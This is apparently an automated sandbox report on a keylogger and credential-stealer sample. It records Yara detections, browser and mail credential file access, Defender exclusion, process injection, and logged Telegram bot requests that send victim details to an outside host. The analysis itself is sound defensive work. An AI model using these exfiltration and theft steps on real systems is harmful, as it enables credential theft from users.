Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\3140, EUR.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 8.2.3140, EUR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522669 Sample: 3140, EUR.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 3 other IPs or domains 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 15 other signatures 2->72 8 3140, EUR.exe 7 2->8         started        12 lkuPOyvaWlIu.exe 2->12         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 50->68 70 Uses the Telegram API (likely for C&C communication) 52->70 process4 file5 42 C:\Users\user\AppData\...\lkuPOyvaWlIu.exe, PE32 8->42 dropped 44 C:\Users\...\lkuPOyvaWlIu.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmpE737.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\3140, EUR.exe.log, CSV 8->48 dropped 74 Adds a directory exclusion to Windows Defender 8->74 76 Injects a PE file into a foreign processes 8->76 14 3140, EUR.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 24 lkuPOyvaWlIu.exe 12->24         started        26 schtasks.exe 12->26         started        28 lkuPOyvaWlIu.exe 12->28         started        30 lkuPOyvaWlIu.exe 12->30         started        signatures6 process7 dnsIp8 56 api.telegram.org 149.154.167.220, 443, 49768, 49777 TELEGRAMRU United Kingdom 14->56 58 quicklyserv.com 45.143.99.52, 21, 49772, 49778 EKSENBILISIMTR Turkey 14->58 60 2 other IPs or domains 14->60 82 Loading BitLocker PowerShell Module 18->82 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        84 Tries to steal Mail credentials (via file / registry access) 24->84 86 Tries to harvest and steal browser information (history, passwords, etc) 24->86 40 conhost.exe 26->40         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
45.143.99.52
 quicklyserv.com Turkey
208485 EKSENBILISIMTR true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.8.169 true
quicklyserv.com 45.143.99.52 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown
    https://reallyfreegeoip.org/xml/8.46.123.33 false
    • URL Reputation: safe
    		 unknown
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		unknown